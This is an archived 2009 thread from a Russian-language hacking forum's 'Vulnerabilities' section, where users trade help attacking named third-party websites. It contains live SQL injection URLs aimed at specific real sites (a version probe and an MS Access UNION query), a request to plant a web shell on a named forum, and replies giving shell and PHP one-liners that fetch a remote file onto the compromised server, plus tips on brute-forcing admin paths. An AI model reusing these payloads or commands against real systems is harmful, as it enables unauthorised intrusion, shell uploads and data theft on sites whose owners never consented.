ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #4711  
Старый 16.01.2009, 23:36
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от pinky07  
подозреваю, что это 3 версия мускуля
Правильно подозреваешь
http://www.rfrap.ru/site/index.php?p=16+and+substring(version(),1,1)=3
Вот материал по проведению инъекций в третьей ветке
https://forum.antichat.ru/showpost.php?p=565034&postcount=4
 

  #4712  
Старый 16.01.2009, 23:46
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию

Подскажите хорошую прогу которая брутит путь к админке, а то угадать самому не получается, или хотябы список самых распространенных путей.
 

  #4713  
Старый 16.01.2009, 23:52
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

в паблике нет, но не сложно самому написать (просто проверяешь заголовки на ошибки 404 и т.д.)
 

  #4714  
Старый 16.01.2009, 23:57
prescott
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470

Репутация: 115
По умолчанию

Цитата:
Сообщение от Pashkela  
в паблике нет, но не сложно самому написать (просто проверяешь заголовки на ошибки 404 и т.д.)
Это понятно, но брутить простым перебором придется оченб долго, все равно надо словари...
 

  #4715  
Старый 16.01.2009, 23:58
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Сообщение от prescott  
Подскажите хорошую прогу которая брутит путь к админке, а то угадать самому не получается, или хотябы список самых распространенных путей.
Используй сканеры. К примеру Web Vulnerability Scanner или jsky.
 

  #4716  
Старый 17.01.2009, 00:13
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Цитата:
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+or+1=(select+top +1+@@version)--&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
как быть?

кто подстажет каким методом можна залить сюда нормальный шелл?
http://forum.fwuo.ru/ajax.php?vital=pwd

и еще.. нужны кодеры который могуть писать сплоиты!
 

  #4717  
Старый 17.01.2009, 00:18
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Цитата:
как быть?
здесь MS Access, нужно подбирать таблицу наугад
http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+UNION+SELECT+1,2 ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23+FROM+%60MSysObjects%60%00&NWS=NWS&ap=NewsDe tail.asp&p=ASP%5C~Pg0.asp
доступа к MSysObjects нет

Цитата:
кто подстажет каким методом можна залить сюда нормальный шелл?
http://forum.fwuo.ru/ajax.php?vital=pwd
с помощью команды fetch
fetch -p [src] -O [out]

Последний раз редактировалось [Raz0r]; 17.01.2009 в 00:23..
 

  #4718  
Старый 17.01.2009, 00:35
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

[Raz0r]
спс за msa

фетч пробвал... чтото не проканало) еще попробую.. елси нет есть еще варианты?
 

  #4719  
Старый 17.01.2009, 01:06
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

как вариант выполнить пхп-код:
php -r "file_put_contents($out,file_get_contents($src ));"
 

  #4720  
Старый 17.01.2009, 04:10
betakley
Новичок
Регистрация: 29.12.2008
Сообщений: 24
Провел на форуме:
228928

Репутация: 20
По умолчанию

доброй ночи, есть вопрос, возможно глупый, но для меня важный.
если я войду на определенный сайт под своим аккаунтом, а затем запущу скрипт на веб-сервере своего компьютера (в том же браузере), который задаст значение переменной и проинклудит скрипт с того сайта, чтобы он увидел эту переменную как глобальную, то будет ли при этом инклуде доступна моя текущая сессия?
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ